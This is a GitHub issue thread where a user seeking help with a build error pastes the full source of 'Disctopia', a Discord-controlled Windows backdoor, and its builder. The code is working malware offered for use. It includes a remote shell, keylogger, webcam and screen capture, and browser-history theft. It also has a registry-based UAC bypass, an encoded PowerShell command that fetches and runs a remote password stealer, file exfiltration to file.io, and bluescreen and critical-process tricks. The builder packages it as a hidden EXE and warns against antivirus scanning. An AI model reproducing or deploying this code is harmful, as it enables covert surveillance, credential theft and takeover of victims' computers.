Closed yasinworks closed 2 years ago
this is probably a python version error. Did u run it on python3.8.9??
yes, in venv
I need a little more information. What were you doing before this happened? what commands did you execute?
venv\Scripts\activate.bat python builder.py fetch
i have modified main.py and builder.py. i can send these files
I will need to see the modified files and please note that we can help with the default code of disctopia.
`# -- coding: utf-8 --
import json import subprocess import os import argparse from prettytable import PrettyTable
class Builder:
def __init__(self,BACKDOOR_NAME,BOT_TOKEN,DEBUG):
self.BACKDOOR_NAME = BACKDOOR_NAME
self.BOT_TOKEN = BOT_TOKEN
self.DEBUG = DEBUG
self.path_to_pyinstaller = os.path.expanduser('~/.wine/drive_c/users/root/Local Settings/Application Data/Programs/Python/Python38-32/Scripts/pyinstaller.exe')
def build(self):
f = open("code/main.py", 'r')
file = f.read()
f.close()
newfile = newfile.replace("{BOT_TOKEN}", str(self.BOT_TOKEN))
f = open(self.BACKDOOR_NAME+".py", 'w')
f.write(newfile)
f.close()
self.compile()
def compile(self):
compile_command = ["wine", self.path_to_pyinstaller, "--onefile", "--noconsole", "--icon=img/exe_file.ico", self.BACKDOOR_NAME+".py"]
if self.DEBUG == True:
compile_command.pop(3)
if os.name == 'nt':
compile_command[1] = 'venv/Scripts/pyinstaller.exe'
compile_command.remove("wine")
subprocess.call(compile_command)
try:
os.remove(self.BACKDOOR_NAME+".py");os.remove(self.BACKDOOR_NAME+".spec")
except FileNotFoundError:
pass
print('''
▓█████▄ ██▓ ██████ ▄████▄ ▄▄▄█████▓ ▒█████ ██▓███ ██▓ ▄▄▄
▒██▀ ██▌▓██▒▒██ ▒ ▒██▀ ▀█ ▓ ██▒ ▓▒▒██▒ ██▒▓██░ ██▒▓██▒▒████▄
░██ █▌▒██▒░ ▓██▄ ▒▓█ ▄ ▒ ▓██░ ▒░▒██░ ██▒▓██░ ██▓▒▒██▒▒██ ▀█▄
░▓█▄ ▌░██░ ▒ ██▒▒▓▓▄ ▄██▒░ ▓██▓ ░ ▒██ ██░▒██▄█▓▒ ▒░██░░██▄▄▄▄██
░▒████▓ ░██░▒██████▒▒▒ ▓███▀ ░ ▒██▒ ░ ░ ████▓▒░▒██▒ ░ ░░██░ ▓█ ▓██▒
▒▒▓ ▒ ░▓ ▒ ▒▓▒ ▒ ░░ ░▒ ▒ ░ ▒ ░░ ░ ▒░▒░▒░ ▒▓▒░ ░ ░░▓ ▒▒ ▓▒█░
░ ▒ ▒ ▒ ░░ ░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░▒ ░ ▒ ░ ▒ ▒▒ ░
░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ▒ ░ ░ ▒
░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
Made by Dimitris Kalopisis | Twitter: @DKalopisis\n\n\n''')
list =["None","None"]
def getArgs(): parser = argparse.ArgumentParser(description='Disctopia Backdoor Builder') parser.add_argument('-b', '--build', help='Build the Backdoor', action='store_true')
return parser.parse_args()
def createTable(list): table = PrettyTable(["Setting", "Value"])
table.add_row(["Backdoor-Name", list[0]])
table.add_row(["Bot-Token", list[1]])
return table
def fetch(list): with open("settings.json", 'r') as file: data = json.load(file) list[0] = data["settings"]["backdoor-name"] list[1] = data["settings"]["bot-token"]
return list
arguments = getArgs()
if arguments.build: if os.path.isfile("settings.json"): list = fetch(list) print(createTable(list)) answer = input("\nAre the backdoor settings correct? (Y/N) \n").lower() if answer == "y": print("\n[+] Building the Backdoor") print("[+] Please wait...\n") builder = Builder(list[0],list[1]) builder.build() print('\n[+] The Backdoor can be found inside the "dist" directory') print('\nDO NOT UPLOAD THE BACKDOOR TO VIRUS TOTAL') else: exit() else: print("[-] settings.json not found!")
else: cont = True
print('Run "help" to get the help menu')
try:
while cont:
try:
command = input("[+] > ")
command_list = command.split()
if command_list[0] == "exit":
print("\n[+] Exiting!")
exit()
elif command_list[0] == "help":
print('''\n
Help Menu:
"help" Displays this message
"set SETTING VALUE" Sets a value to a valid setting
"fetch" Fetches the settings from the settings.json file
"config" Shows the settings and their values
"build" Packages the backdoor into an EXE file
"exit" Terminates the builder
\n''')
elif command_list[0] == "config":
table = createTable(list)
print(f"\n{table.get_string(title='Disctopia Backdoor Settings')}\n")
elif command_list[0] == "fetch":
if os.path.isfile("settings.json"):
fetch(list)
print("\n[+] Settings fetched from settings.json!\n")
else:
print("\n[-] settings.json not found!\n")
elif command_list[0] == "build":
answer = input("\nAre you sure everything is setup correctly? Y/N \n").lower()
if answer == "y":
print("\n[+] Building the Backdoor")
print("[+] Please wait...\n")
if "-d" in command_list:
debug = True
else:
debug = False
builder = Builder(BACKDOOR_NAME=list[0],BOT_TOKEN=list[1],DEBUG=debug)
builder.build()
cont = False
print('\n[+] The Backdoor can be found inside the "dist" directory')
print('\nDO NOT UPLOAD THE BACKDOOR TO VIRUS TOTAL')
elif answer == "n":
pass
else:
print("\n[-] Invalid Answer\n")
elif command_list[0] == "set":
if command_list[1].lower() == "backdoor-name":
list[0] = command_list[2]
print(f"\n[+] Changed Backdoor-Name\n")
elif command_list[1].lower() == "bot-token":
list[1] = command_list[2]
print(f"\n[+] Changed Bot-Token to \n")
else:
print(f'\n[-] Unknown Setting "{command_list[1]}" Try "help"\n')
else:
print(f'\n[-] Unknown Command "{command_list[0]}" Try "help"\n')
except IndexError:
pass
except KeyboardInterrupt:
print("\n\n[+] Exiting")
`
`# -- coding: utf-8 -- import winreg import ctypes import sys import os import ssl import random import threading import time import cv2 import subprocess import discord from comtypes import CLSCTX_ALL from pycaw.pycaw import AudioUtilities, IAudioEndpointVolume from discord.ext import commands from ctypes import * import asyncio import discord from discord import utils token = "{BOT_TOKEN}"
global isexe isexe=False if (sys.argv[0].endswith("exe")): isexe=True global appdata global temp appdata = os.getenv('APPDATA') temp= os.getenv('temp') client = discord.Client() bot = commands.Bot(command_prefix='!') ssl._create_default_https_context = ssl._create_unverified_context helpmenu = """ Availaible commands are :
--> !message = Show a message box displaying your text / Syntax = "!message example" --> !shell = Execute a shell command /Syntax = "!shell whoami" --> !webcampic = Take a picture from the webcam --> !windowstart = Start logging current user window (logging is shown in the bot activity) --> !windowstop = Stop logging current user window --> !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test" --> !admincheck = Check if program has admin privileges --> !sysinfo = Gives info about infected computer --> !history = Get chrome browser history --> !download = Download a file from infected computer --> !upload = Upload file to the infected computer / Syntax = "!upload file.png" (with attachment) --> !cd = Changes directory --> !delete = deletes a file / Syntax = "!delete /path to/the/file.txt" --> !write = Type your desired sentence on computer / Type "enter" to press the enter button on the computer --> !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment) --> !clipboard = Retrieve infected computer clipboard content --> !geolocate = Geolocate computer using latitude and longitude of the ip adress with google map / Warning : Geolocating IP adresses is not very precise --> !startkeylogger = Starts a keylogger --> !stopkeylogger = Stops keylogger --> !dumpkeylogger = Dumps the keylog --> !volumemax = Put volume to max --> !volumezero = Put volume at 0 --> !idletime = Get the idle time of user's on target computer --> !listprocess = Get all process --> !blockinput = Blocks user's keyboard and mouse / Warning : Admin rights are required --> !unblockinput = Unblocks user's keyboard and mouse / Warning : Admin rights are required --> !screenshot = Get the screenshot of the user's current screen --> !exit = Exit program --> !kill = Kill a session or all sessions / Syntax = "!kill session-3" or "!kill all" --> !uacbypass = attempt to bypass uac to gain admin by using fod helper --> !passwords = grab all passwords --> !streamwebcam = streams webcam by sending multiple pictures --> !stopwebcam = stop webcam stream --> !streamscreen = stream screen by sending multiple pictures --> !stopscreen = stop screen stream --> !shutdown = shutdown computer --> !restart = restart computer --> !logoff = log off current user --> !bluescreen = BlueScreen PC --> !displaydir = display all items in current dir --> !currentdir = display the current dir --> !dateandtime = display system date and time --> !prockill = kill a process by name / syntax = "!kill process.exe" --> !recscreen = record screen for certain amount of time / syntax = "!recscreen 10" --> !reccam = record camera for certain amount of time / syntax = "!reccam 10" --> !recaudio = record audio for certain amount of time / syntax = "!recaudio 10" --> !disableantivirus = permanently disable windows defender(requires admin) --> !disablefirewall = disable windows firewall (requires admin) --> !audio = play a audio file on the target computer(.wav only) / Syntax = "!audio" (with attachment) --> !selfdestruct = delete all traces that this program was on the target PC --> !windowspass = attempt to phish password by poping up a password dialog --> !displayoff = turn off the monitor(Admin rights are required) --> !displayon = turn on the monitors(Admin rights are required) --> !hide = hide the file by changing the attribute to hidden --> !unhide = unhide the file the removing the attribute to make it unhidden --> !ejectcd = eject the cd drive on computer --> !retractcd = retract the cd drive on the computer --> !critproc = make program a critical process. meaning if its closed the computer will bluescreen(Admin rights are required) --> !uncritproc = if the process is a critical process it will no longer be a critical process meaning it can be closed without bluescreening(Admin rights are required) --> !website = open a website on the infected computer / syntax = "!website google.com" or "!website www.google.com" --> !distaskmgr = disable task manager(Admin rights are required) --> !enbtaskmgr = enable task manager(if disabled)(Admin rights are required) --> !getwifipass = get all the wifi passwords on the current device(Admin rights are required) --> !startup = add file to startup(when computer go on this file starts)(Admin rights are required) """
async def activity(client): import time import win32gui while True: global stop_threads if stop_threads: break current_window = win32gui.GetWindowText(win32gui.GetForegroundWindow()) window_displayer = discord.Game(f"Visiting: {current_window}") await client.change_presence(status=discord.Status.online, activity=window_displayer) time.sleep(1)
def between_callback(client): loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) loop.run_until_complete(activity(client)) loop.close()
@client.event
async def on_ready():
import platform
import re
import urllib.request
import json
with urllib.request.urlopen("https://geolocation-db.com/json") as url:
data = json.loads(url.read().decode())
flag = data['country_code']
ip = data['IPv4']
import os
total = []
global number
number = 1
global channel_name
channel_name = None
for x in client.get_all_channels():
total.append(x.name)
for y in range(len(total)):
if total[y].startswith("session"):
import re
result = [e for e in re.split("[^0-9]", total[y]) if e != '']
biggest = max(map(int, result))
number = biggest + 1
else:
pass
channel_name = f"session-{number}"
newchannel = await client.guilds[0].create_text_channel(channelname)
channel = discord.utils.get(client.get_all_channels(), name=channel_name)
channel = client.getchannel(channel.id)
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
value1 = f"@here :white_check_mark: New session opened {channelname} | {platform.system()} {platform.release()} | :flag{flag.lower()}: | User : {os.getlogin()} | IP: {ip}"
if is_admin == True:
await channel.send(f'{value1} | admin!')
elif is_admin == False:
await channel.send(value1)
game = discord.Game(f"Window logging stopped")
await client.change_presence(status=discord.Status.online, activity=game)
def volumeup(): devices = AudioUtilities.GetSpeakers() interface = devices.Activate(IAudioEndpointVolume.iid, CLSCTX_ALL, None) volume = cast(interface, POINTER(IAudioEndpointVolume)) if volume.GetMute() == 1: volume.SetMute(0, None) volume.SetMasterVolumeLevel(volume.GetVolumeRange()[1], None)
def volumedown(): devices = AudioUtilities.GetSpeakers() interface = devices.Activate(IAudioEndpointVolume.iid, CLSCTX_ALL, None) volume = cast(interface, POINTER(IAudioEndpointVolume)) volume.SetMasterVolumeLevel(volume.GetVolumeRange()[0], None) def critproc(): import ctypes ctypes.windll.ntdll.RtlAdjustPrivilege(20, 1, 0, ctypes.byref(ctypes.c_bool())) ctypes.windll.ntdll.RtlSetProcessIsCritical(1, 0, 0) == 0
def uncritproc(): import ctypes ctypes.windll.ntdll.RtlSetProcessIsCritical(0, 0, 0) == 0
@client.event async def on_message(message): if message.channel.name != channel_name: pass else: total = [] for x in client.get_all_channels(): total.append(x.name) if message.content.startswith("!kill"): try: if message.content[6:] == "all": for y in range(len(total)): if "session" in total[y]: channel_to_delete = discord.utils.get(client.get_all_channels(), name=total[y]) await channel_to_delete.delete() else: pass else: channel_to_delete = discord.utils.get(client.get_all_channels(), name=message.content[6:]) await channel_to_delete.delete() await message.channel.send(f"[*] {message.content[6:]} killed.") except: await message.channel.send(f"[!] {message.content[6:]} is invalid,please enter a valid session name")
if message.content == "!dumpkeylogger":
import os
temp = os.getenv("TEMP")
file_keys = temp + r"\key_log.txt"
file = discord.File(file_keys, filename="key_log.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
os.remove(file_keys)
if message.content == "!exit":
import sys
uncritproc()
sys.exit()
if message.content == "!windowstart":
import threading
global stop_threads
stop_threads = False
global _thread
_thread = threading.Thread(target=between_callback, args=(client,))
_thread.start()
await message.channel.send("[*] Window logging for this session started")
if message.content == "!windowstop":
stop_threads = True
await message.channel.send("[*] Window logging for this session stopped")
game = discord.Game(f"Window logging stopped")
await client.change_presence(status=discord.Status.online, activity=game)
if message.content == "!screenshot":
import os
from mss import mss
with mss() as sct:
sct.shot(output=os.path.join(os.getenv('TEMP') + r"\monitor.png"))
path = (os.getenv('TEMP')) + r"\monitor.png"
file = discord.File((path), filename="monitor.png")
await message.channel.send("[*] Command successfuly executed", file=file)
os.remove(path)
if message.content == "!volumemax":
volumeup()
await message.channel.send("[*] Volume put to 100%")
if message.content == "!volumezero":
volumedown()
await message.channel.send("[*] Volume put to 0%")
if message.content == "!webcampic":
import os
import time
import cv2
temp = (os.getenv('TEMP'))
camera_port = 0
camera = cv2.VideoCapture(camera_port)
#time.sleep(0.1)
return_value, image = camera.read()
cv2.imwrite(temp + r"\temp.png", image)
del(camera)
file = discord.File(temp + r"\temp.png", filename="temp.png")
await message.channel.send("[*] Command successfuly executed", file=file)
if message.content.startswith("!message"):
import ctypes
import time
MB_YESNO = 0x04
MB_HELP = 0x4000
ICON_STOP = 0x10
def mess():
ctypes.windll.user32.MessageBoxW(0, message.content[8:], "Error", MB_HELP | MB_YESNO | ICON_STOP) #Show message box
import threading
messa = threading.Thread(target=mess)
messa._running = True
messa.daemon = True
messa.start()
import win32con
import win32gui
def get_all_hwnd(hwnd,mouse):
def winEnumHandler(hwnd, ctx):
if win32gui.GetWindowText(hwnd) == "Error":
win32gui.ShowWindow(hwnd, win32con.SW_RESTORE)
win32gui.SetWindowPos(hwnd,win32con.HWND_NOTOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
win32gui.SetWindowPos(hwnd,win32con.HWND_TOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
win32gui.SetWindowPos(hwnd,win32con.HWND_NOTOPMOST, 0, 0, 0, 0, win32con.SWP_SHOWWINDOW + win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
return None
else:
pass
if win32gui.IsWindow(hwnd) and win32gui.IsWindowEnabled(hwnd) and win32gui.IsWindowVisible(hwnd):
win32gui.EnumWindows(winEnumHandler,None)
win32gui.EnumWindows(get_all_hwnd, 0)
if message.content.startswith("!wallpaper"):
import ctypes
import os
path = os.path.join(os.getenv('TEMP') + r"\temp.jpg")
await message.attachments[0].save(path)
ctypes.windll.user32.SystemParametersInfoW(20, 0, path , 0)
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!upload"):
await message.attachments[0].save(message.content[8:])
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!shell"):
global status
status = None
import subprocess
import os
instruction = message.content[7:]
def shell(command):
output = subprocess.run(command, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output.stdout.decode('CP437').strip()
out = shell(instruction)
print(out)
print(status)
if status:
numb = len(out)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
f1 = open(temp + r"\output.txt", 'a')
f1.write(out)
f1.close()
file = discord.File(temp + r"\output.txt", filename="output.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
os.remove(temp + r"\output.txt")
else:
await message.channel.send("[*] Command successfuly executed : " + out)
else:
await message.channel.send("[*] Command not recognized or no output was obtained")
status = None
if message.content.startswith("!download"):
import subprocess
import os
filename=message.content[10:]
check2 = os.stat(filename).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
response = requests.post('https://file.io/', files={"file": open(filename, "rb")}).json()["link"]
await message.channel.send("download link: " + response)
await message.channel.send("[*] Command successfuly executed")
else:
file = discord.File(message.content[10:], filename=message.content[10:])
await message.channel.send("[*] Command successfuly executed", file=file)
if message.content.startswith("!cd"):
import os
os.chdir(message.content[4:])
await message.channel.send("[*] Command successfuly executed")
if message.content == "!help":
import os
temp = (os.getenv('TEMP'))
f5 = open(temp + r"\helpmenu.txt", 'a')
f5.write(str(helpmenu))
f5.close()
temp = (os.getenv('TEMP'))
file = discord.File(temp + r"\helpmenu.txt", filename="helpmenu.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
os.remove(temp + r"\helpmenu.txt")
if message.content.startswith("!write"):
import pyautogui
if message.content[7:] == "enter":
pyautogui.press("enter")
else:
pyautogui.typewrite(message.content[7:])
if message.content == "!history":
import sqlite3
import os
import time
import shutil
temp = (os.getenv('TEMP'))
Username = (os.getenv('USERNAME'))
shutil.rmtree(temp + r"\history12", ignore_errors=True)
os.mkdir(temp + r"\history12")
path_org = r""" "C:\Users\{}\AppData\Local\Google\Chrome\User Data\Default\History" """.format(Username)
path_new = temp + r"\history12"
copy_me_to_here = (("copy" + path_org + "\"{}\"" ).format(path_new))
os.system(copy_me_to_here)
con = sqlite3.connect(path_new + r"\history")
cursor = con.cursor()
cursor.execute("SELECT url FROM urls")
urls = cursor.fetchall()
for x in urls:
done = ("".join(x))
f4 = open(temp + r"\history12" + r"\history.txt", 'a')
f4.write(str(done))
f4.write(str("\n"))
f4.close()
con.close()
file = discord.File(temp + r"\history12" + r"\history.txt", filename="history.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
def deleteme() :
path = "rmdir " + temp + r"\history12" + " /s /q"
os.system(path)
deleteme()
if message.content == "!clipboard":
import ctypes
import os
CF_TEXT = 1
kernel32 = ctypes.windll.kernel32
kernel32.GlobalLock.argtypes = [ctypes.c_void_p]
kernel32.GlobalLock.restype = ctypes.c_void_p
kernel32.GlobalUnlock.argtypes = [ctypes.c_void_p]
user32 = ctypes.windll.user32
user32.GetClipboardData.restype = ctypes.c_void_p
user32.OpenClipboard(0)
if user32.IsClipboardFormatAvailable(CF_TEXT):
data = user32.GetClipboardData(CF_TEXT)
data_locked = kernel32.GlobalLock(data)
text = ctypes.c_char_p(data_locked)
value = text.value
kernel32.GlobalUnlock(data_locked)
body = value.decode()
user32.CloseClipboard()
await message.channel.send("[*] Command successfuly executed : " + "Clipboard content is : " + str(body))
if message.content == "!sysinfo":
import platform
jak = str(platform.uname())
intro = jak[12:]
from requests import get
ip = get('https://api.ipify.org').text
pp = "IP Address = " + ip
await message.channel.send("[*] Command successfuly executed : " + intro + pp)
if message.content == "!geolocate":
import urllib.request
import json
with urllib.request.urlopen("https://geolocation-db.com/json") as url:
data = json.loads(url.read().decode())
link = f"http://www.google.com/maps/place/{data['latitude']},{data['longitude']}"
await message.channel.send("[*] Command successfuly executed : " + link)
if message.content == "!admincheck":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
await message.channel.send("[*] Congrats you're admin")
elif is_admin == False:
await message.channel.send("[!] Sorry, you're not admin")
if message.content == "!uacbypass":
import winreg
import ctypes
import sys
import os
import time
import inspect
def isAdmin():
try:
is_admin = (os.getuid() == 0)
except AttributeError:
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
return is_admin
if isAdmin():
await message.channel.send("Your already admin!")
else:
class disable_fsr():
disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection
revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection
def __enter__(self):
self.old_value = ctypes.c_long()
self.success = self.disable(ctypes.byref(self.old_value))
def __exit__(self, type, value, traceback):
if self.success:
self.revert(self.old_value)
await message.channel.send("attempting to get admin!")
isexe=False
if (sys.argv[0].endswith("exe")):
isexe=True
if not isexe:
test_str = sys.argv[0]
current_dir = inspect.getframeinfo(inspect.currentframe()).filename
cmd2 = current_dir
create_reg_path = """ powershell New-Item "HKCU:\SOFTWARE\Classes\ms-settings\Shell\Open\command" -Force """
os.system(create_reg_path)
create_trigger_reg_key = """ powershell New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "hi" -Force """
os.system(create_trigger_reg_key)
create_payload_reg_key = """powershell Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "`(Default`)" -Value "'cmd /c start python """ + '""' + '"' + '"' + cmd2 + '""' + '"' + '"\'"' + """ -Force"""
os.system(create_payload_reg_key)
else:
test_str = sys.argv[0]
current_dir = test_str
cmd2 = current_dir
create_reg_path = """ powershell New-Item "HKCU:\SOFTWARE\Classes\ms-settings\Shell\Open\command" -Force """
os.system(create_reg_path)
create_trigger_reg_key = """ powershell New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "hi" -Force """
os.system(create_trigger_reg_key)
create_payload_reg_key = """powershell Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "`(Default`)" -Value "'cmd /c start """ + '""' + '"' + '"' + cmd2 + '""' + '"' + '"\'"' + """ -Force"""
os.system(create_payload_reg_key)
with disable_fsr():
os.system("fodhelper.exe")
time.sleep(2)
remove_reg = """ powershell Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force """
os.system(remove_reg)
if message.content == "!startkeylogger":
import base64
import os
from pynput.keyboard import Key, Listener
import logging
temp = os.getenv("TEMP")
log_dir = temp
logging.basicConfig(filename=(log_dir + r"\key_log.txt"),
level=logging.DEBUG, format='%(asctime)s: %(message)s')
def keylog():
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
import threading
global test
test = threading.Thread(target=keylog)
test._running = True
test.daemon = True
test.start()
await message.channel.send("[*] Keylogger successfuly started")
if message.content == "!stopkeylogger":
import os
test._running = False
await message.channel.send("[*] Keylogger successfuly stopped")
if message.content == "!idletime":
class LASTINPUTINFO(Structure):
_fields_ = [
('cbSize', c_uint),
('dwTime', c_int),
]
def get_idle_duration():
lastInputInfo = LASTINPUTINFO()
lastInputInfo.cbSize = sizeof(lastInputInfo)
if windll.user32.GetLastInputInfo(byref(lastInputInfo)):
millis = windll.kernel32.GetTickCount() - lastInputInfo.dwTime
return millis / 1000.0
else:
return 0
duration = get_idle_duration()
await message.channel.send(f'User idle for {duration:.2f} seconds.')
if message.content.startswith("!voice"):
volumeup()
import win32com.client as wincl
speak = wincl.Dispatch("SAPI.SpVoice")
speak.Speak(message.content[7:])
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!blockinput"):
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
ok = windll.user32.BlockInput(True)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content.startswith("!unblockinput"):
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
ok = windll.user32.BlockInput(False)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!passwords" :
import subprocess
import os
temp= os.getenv('temp')
def shell(command):
output = subprocess.run(command, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output.stdout.decode('CP437').strip()
passwords = shell("Powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIASgBHAGwAdQBjADMAUgBoAGIAbQBOAGwASQBEADAAZwBXADAARgBqAGQARwBsADIAWQBYAFIAdgBjAGwAMAA2AE8AawBOAHkAWgBXAEYAMABaAFUAbAB1AGMAMwBSAGgAYgBtAE4AbABLAEYAdABUAGUAWABOADAAWgBXADAAdQBVAG0AVgBtAGIARwBWAGoAZABHAGwAdgBiAGkANQBCAGMAMwBOAGwAYgBXAEoAcwBlAFYAMAA2AE8AawB4AHYAWQBXAFEAbwBLAEUANQBsAGQAeQAxAFAAWQBtAHAAbABZADMAUQBnAFUAMwBsAHoAZABHAFYAdABMAGsANQBsAGQAQwA1AFgAWgBXAEoARABiAEcAbABsAGIAbgBRAHAATABrAFIAdgBkADIANQBzAGIAMgBGAGsAUgBHAEYAMABZAFMAZwBpAGEASABSADAAYwBIAE0ANgBMAHkAOQB5AFkAWABjAHUAWgAyAGwAMABhAEgAVgBpAGQAWABOAGwAYwBtAE4AdgBiAG4AUgBsAGIAbgBRAHUAWQAyADkAdABMADAAdwB4AFoAMgBoADAAVABUAFIAdQBMADAAUgA1AGIAbQBGAHQAYQBXAE4AVABkAEcAVgBoAGIARwBWAHkATAAyADEAaABhAFcANAB2AFIARQB4AE0ATAAxAEIAaABjADMATgAzAGIAMwBKAGsAVQAzAFIAbABZAFcAeABsAGMAaQA1AGsAYgBHAHcAaQBLAFMAawB1AFIAMgBWADAAVgBIAGwAdwBaAFMAZwBpAFUARwBGAHoAYwAzAGQAdgBjAG0AUgBUAGQARwBWAGgAYgBHAFYAeQBMAGwATgAwAFoAVwBGAHMAWgBYAEkAaQBLAFMAawBOAEMAaQBSAHcAWQBYAE4AegBkADIAOQB5AFoASABNAGcAUABTAEEAawBhAFcANQB6AGQARwBGAHUAWQAyAFUAdQBSADIAVgAwAFYASABsAHcAWgBTAGcAcABMAGsAZABsAGQARQAxAGwAZABHAGgAdgBaAEMAZwBpAFUAbgBWAHUASQBpAGsAdQBTAFcANQAyAGIAMgB0AGwASwBDAFIAcABiAG4ATgAwAFkAVwA1AGoAWgBTAHcAawBiAG4AVgBzAGIAQwBrAE4AQwBsAGQAeQBhAFgAUgBsAEwAVQBoAHYAYwAzAFEAZwBKAEgAQgBoAGMAMwBOADMAYgAzAEoAawBjAHcAMABLACIAfQAnACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AKQAuAFMAYwByAGkAcAB0ACkAKQAgAHwAIABpAGUAeAA=")
f4 = open(temp + r"\passwords.txt", 'w')
f4.write(str(passwords))
f4.close()
file = discord.File(temp + r"\passwords.txt", filename="passwords.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
os.remove(temp + r"\passwords.txt")
if message.content == "!streamwebcam" :
await message.channel.send("[*] Command successfuly executed")
import os
import time
import cv2
import threading
import sys
import pathlib
temp = (os.getenv('TEMP'))
camera_port = 0
camera = cv2.VideoCapture(camera_port)
running = message.content
file = temp + r"\hobo\hello.txt"
if os.path.isfile(file):
delelelee = "del " + file + r" /f"
os.system(delelelee)
os.system(r"RMDIR %temp%\hobo /s /q")
while True:
return_value, image = camera.read()
cv2.imwrite(temp + r"\temp.png", image)
boom = discord.File(temp + r"\temp.png", filename="temp.png")
kool = await message.channel.send(file=boom)
temp = (os.getenv('TEMP'))
file = temp + r"\hobo\hello.txt"
if os.path.isfile(file):
del camera
break
else:
continue
if message.content == "!stopwebcam":
import os
os.system(r"mkdir %temp%\hobo")
os.system(r"echo hello>%temp%\hobo\hello.txt")
os.system(r"del %temp\temp.png /F")
if message.content == "!streamscreen" :
await message.channel.send("[*] Command successfuly executed")
import os
from mss import mss
temp = (os.getenv('TEMP'))
hellos = temp + r"\hobos\hellos.txt"
if os.path.isfile(hellos):
os.system(r"del %temp%\hobos\hellos.txt /f")
os.system(r"RMDIR %temp%\hobos /s /q")
else:
pass
while True:
with mss() as sct:
sct.shot(output=os.path.join(os.getenv('TEMP') + r"\monitor.png"))
path = (os.getenv('TEMP')) + r"\monitor.png"
file = discord.File((path), filename="monitor.png")
await message.channel.send(file=file)
temp = (os.getenv('TEMP'))
hellos = temp + r"\hobos\hellos.txt"
if os.path.isfile(hellos):
break
else:
continue
if message.content == "!stopscreen":
import os
os.system(r"mkdir %temp%\hobos")
os.system(r"echo hello>%temp%\hobos\hellos.txt")
os.system(r"del %temp%\monitor.png /F")
if message.content == "!shutdown":
import os
uncritproc()
os.system("shutdown /p")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!restart":
import os
uncritproc()
os.system("shutdown /r /t 00")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!logoff":
import os
uncritproc()
os.system("shutdown /l /f")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!bluescreen":
import ctypes
import ctypes.wintypes
ctypes.windll.ntdll.RtlAdjustPrivilege(19, 1, 0, ctypes.byref(ctypes.c_bool()))
ctypes.windll.ntdll.NtRaiseHardError(0xc0000022, 0, 0, 0, 6, ctypes.byref(ctypes.wintypes.DWORD()))
if message.content == "!currentdir":
import subprocess as sp
output = sp.getoutput('cd')
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("output is : " + output)
if message.content == "!displaydir":
import subprocess as sp
import os
import subprocess
def shell():
output = subprocess.run("dir", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
out = shell()
if status:
result = out
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
if os.path.isfile(temp + r"\output22.txt"):
os.system(r"del %temp%\output22.txt /f")
f1 = open(temp + r"\output22.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output22.txt", filename="output22.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
if message.content == "!dateandtime":
import subprocess as sp
output = sp.getoutput(r'echo time = %time% date = %date%')
await message.channel.send("[*] Command successfuly executed")
